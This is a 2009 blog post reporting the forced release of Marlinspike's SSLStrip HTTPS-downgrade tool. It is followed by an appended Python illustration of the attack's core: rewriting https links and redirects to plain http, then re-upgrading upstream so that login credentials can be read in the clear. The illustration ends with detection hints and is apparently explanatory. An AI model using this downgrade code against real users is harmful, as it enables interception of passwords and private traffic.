Tuesday, February 24, 2009

SSLStrip Hacking Tool Gets 'Hacked,' Then Released

Via DarkReading -

In a bizarre twist, a hacker found his way onto another hacker's Web server and forced the release of a hacking tool that was first demonstrated last week at Black Hat DC. The so-called SSLStrip tool sits between a victim and the Web, intercepts the victim's plaintext HTTP traffic, and rewrites the links and redirects that would have sent the browser to HTTPS, so the user keeps browsing over unencrypted HTTP, with no lock icon, while believing they are on a secure Website. The tool is now available for download.

Moxie Marlinspike, the hacker who created and demonstrated the tool in his Black Hat talk, had planned to eventually release the tool, but went ahead and officially did so late yesterday after an unknown hacker apparently guessed the unpublished URL Marlinspike was using to stage the tool and posted it on Slashdot.

"Greetings slashdotters. Apparently the demand for this has been so great that someone went to the trouble of wardialing for the unpublished URL where sslstrip was being staged on my webserver. Then having guessed the correct URL, and not content to merely have access, they also slashdotted it," Marlinspike wrote in a message on his Website.

Marlinspike's tool lets an attacker or researcher who already sits in the path of a victim's traffic stage a man-in-the-middle attack against a Secure Sockets Layer (SSL) Web session. It does not break SSL's cryptography; it prevents the browser from ever negotiating the SSL session, while the tool itself talks SSL to the real site on the victim's behalf. Marlinspike says there's no simple fix for defending against the attack because it's not a typical software bug or protocol vulnerability that can be patched. "It's hard to fix," he said in an interview. "This attack comes closer to an implementation bug...it's a problem with the way SSL is deployed."
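The core of the downgrade described above, written out as an added example in Python. This is not code from sslstrip or from Marlinspike; it is an illustration of the technique, and the bank page, hostnames and headers in it are constructed sample data. Two halves are needed: on the way to the victim, every https:// URL in a plaintext response (page body and redirect Location headers) is rewritten to http:// and the affected hosts are remembered; on the way back, requests the victim now sends in plaintext for those hosts are fetched from the origin over HTTPS, so the real site sees a normal secure session and the victim sees a page that merely lacks the lock.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample of a site's plain-HTTP landing page (not a real site).
SAMPLE_HTML = b"""<html><body>
<a href="https://bank.example/login">Log in</a>
<form action="https://bank.example/auth" method="post">
<input name="user"><input name="pass" type="password"></form>
<img src="https://static.bank.example/logo.png">
<a href="http://bank.example/help">Help</a>
</body></html>"""

# Matches the scheme and host[:port] of an absolute https URL.
HTTPS_RE = re.compile(rb"https://([A-Za-z0-9.\-]+(?::\d+)?)")


class StripState:
    """Remembers which hosts were downgraded so later requests for them
    can be re-upgraded when the proxy fetches from the origin."""

    def __init__(self):
        self.stripped_hosts = set()


def strip_https(body: bytes, state: StripState) -> bytes:
    """Rewrite every https:// URL in a plaintext HTTP response body to
    http://, recording each host that was downgraded."""

    def repl(match):
        host = match.group(1).decode()
        state.stripped_hosts.add(host)
        return b"http://" + match.group(1)

    return HTTPS_RE.sub(repl, body)


def downgrade_redirect(headers: dict, state: StripState) -> dict:
    """Redirects (301/302 Location) to https are rewritten as well;
    otherwise the browser would follow one straight into a real SSL session."""
    out = dict(headers)
    location = out.get("Location")
    if location and location.startswith("https://"):
        state.stripped_hosts.add(urlsplit(location).netloc)
        out["Location"] = "http://" + location[len("https://"):]
    return out


def upstream_url(client_url: str, state: StripState) -> str:
    """Given a plaintext request from the victim, decide how the proxy should
    fetch it from the origin: hosts we downgraded are fetched over https so
    the real site still sees a valid SSL session from the proxy."""
    parts = urlsplit(client_url)
    scheme = "https" if parts.netloc in state.stripped_hosts else parts.scheme
    return urlunsplit((scheme, parts.netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    state = StripState()
    print(strip_https(SAMPLE_HTML, state).decode())
    print(downgrade_redirect({"Location": "https://bank.example/login"}, state))
    # The victim's browser now posts credentials to http://bank.example/auth;
    # the proxy reads them in the clear and forwards them over https.
    print(upstream_url("http://bank.example/auth", state))
```

Nothing in the exchange involves a forged certificate or a browser warning, which is why Marlinspike describes it as a deployment problem rather than a bug: the victim's browser never asked for SSL, so there is nothing for it to verify. From the victim's side the only signal is the missing https:// and lock in the address bar; on the wire, the tell is a plaintext request (a login POST, for instance) to a path the real site only serves over SSL.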
